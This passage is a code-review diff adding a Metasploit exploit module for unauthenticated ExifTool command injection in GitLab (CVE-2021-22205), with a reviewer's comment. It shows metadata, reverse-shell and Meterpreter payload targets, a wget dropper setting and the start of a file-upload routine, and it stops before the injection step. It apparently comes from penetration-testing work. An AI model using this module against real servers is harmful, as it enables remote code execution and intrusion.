modules/exploits/multi/http/gitlab_exif_rce.rb

```diff
@@ -0,0 +1,161 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'GitLab Unauthenticated Remote ExifTool Command Injection',
+        'Description' => %q{
+          This module exploits an unauthenticated file upload and command
+          injection vulenrability in GitLab Community Edition (CE) and
+          Enterprise Edition (EE). The patched versions are 13.10.3, 13.9.6,
+          and 13.8.8.
+
+          Exploitation will results in code execution as the git user.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'William Bowling',  # Vulnerability discovery and CVE-2021-22204 PoC
+          'jbaines-r7'        # Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2021-22205' ],
+          [ 'CVE', '2021-22204' ],
+          [ 'URL', 'https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/' ],
+          [ 'URL', 'https://hackerone.com/reports/1154542' ],
+          [ 'URL', 'https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis']
+        ],
+        'DisclosureDate' => '2021-04-14',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_openssl'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def upload_file(file_data, timeout = 20)
+    random_filename = "#{rand_text_alphanumeric(6..12)}.jpg"
+    multipart_form = Rex::MIME::Message.new
+    multipart_form.add_part(
+      file_data,
+      'image/jpeg',
+      'binary',
+      "form-data; name=\"file\"; filename=\"#{random_filename}\""
+    )
+
+    random_uri = normalize_uri(target_uri.path, rand_text_alphanumeric(6..12).to_s)
```

Comment:
```suggestion
    random_uri = normalize_uri(target_uri.path, rand_text_alphanumeric(6..12))
```

`TARGETURI` needs to be registered as well.